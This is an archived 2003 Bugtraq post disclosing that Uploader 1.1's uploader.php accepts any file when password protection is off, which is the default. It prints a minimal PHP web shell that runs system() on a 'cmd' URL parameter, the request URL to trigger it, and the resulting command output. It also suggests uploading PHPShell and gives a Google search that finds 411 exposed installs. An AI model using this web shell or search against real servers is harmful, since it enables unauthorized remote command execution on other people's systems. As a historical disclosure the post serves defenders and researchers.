uploader.php vulnerability

From: kingcope@gmx.net
Date: 03/04/03

  • Next message: Sven Pechler: "Re: New HP Jetdirect SNMP password vulnerability when using Web JetAdmin"
    Date: Tue, 4 Mar 2003 01:15:47 +0100 (MET)
    From: kingcope@gmx.net
    To: bugtraq@securityfocus.com
    
    

    Uploader Version 1.1 which is available from
    http://www.phpscriptcenter.com/uploader.php
    includes "uploader.php", which lets you upload ANY file (even scripts eg. in
    PHP) onto the server
    if no password protection is specified in the configuration file (default
    set to off).
    The supplied files will be uploaded into directory "uploads" if not
    otherwise configured.

    So if we create a file like this:

    <?php
    $cmd = $_GET["cmd"];
    system("$cmd");
    ?>

    and upload it as "shellemul.php", we can execute commands by targeting our
    browser to
    http://www.victim.com/uploads/shellemul.php?cmd=id
    which will give us -->
    uid=48(apache) gid=48(apache) groups=48(apache)

    We could even upload PHPShell and have more comfortable fun.

    ---
    Google gets me 411 hits for "allinurl: uploader.php"
    ---
    by kcope (kingcope@gmx.net)
    -- 
    +++ GMX - Mail, Messaging & more  http://www.gmx.net +++
    Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
    

  • Next message: Sven Pechler: "Re: New HP Jetdirect SNMP password vulnerability when using Web JetAdmin"